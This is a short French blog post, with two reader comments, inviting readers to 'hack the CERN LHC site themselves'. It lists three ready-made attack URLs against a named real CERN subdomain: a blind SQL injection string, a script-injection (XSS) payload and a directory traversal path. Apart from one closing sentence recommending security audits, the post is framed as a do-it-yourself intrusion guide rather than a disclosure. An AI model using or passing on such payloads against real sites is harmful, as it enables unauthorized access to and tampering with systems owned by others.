Piratez Vous Meme le Site du Grand collisionneur de hadrons du CERN

Vous Avez peut être lu l’article des pirates grec qui se sont introduit dans un sous-domaine du CERN. Cela est d’autant plus intéressant puis que le CERN a dit que le hacker était de 1 à deux pas d’entrer dans le serveur du détecteurs de hadron .

hcc-cern

Âpres quelque petit clics j ai trouver cela : le 3 en 1 des failles de sécurité sur le site LHC du Cern :

SQL Injection Aveugle

http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=A45′ OR 1=1–

XSS

http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=<script >alert(1)>/script>

Affichage du chemin du dossier virtuel

http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=../../../../index.php

Pour tout grand projet IT ou non qui aurait des extension IT devrait subir une audit complete de securité car cela peut eviter la mise a mal de tout le projet .

Tagged : , , ,

2 commentaires pour “Piratez Vous Meme le Site du Grand collisionneur de hadrons du CERN”

  1. Mets un petit Adsense dedans 😀

  2. salut tt le monde
    had shi dial le xss c’est cros site scripting o nas l3ianin homa li makaydirouch la protection des information entrant de plus ana nsaweb un script pl php une zone de text et une boutton ola ay haja proposé par qqu o lkan hass brasso 3wia9 yhackiha yallah

Laisser un Commentaire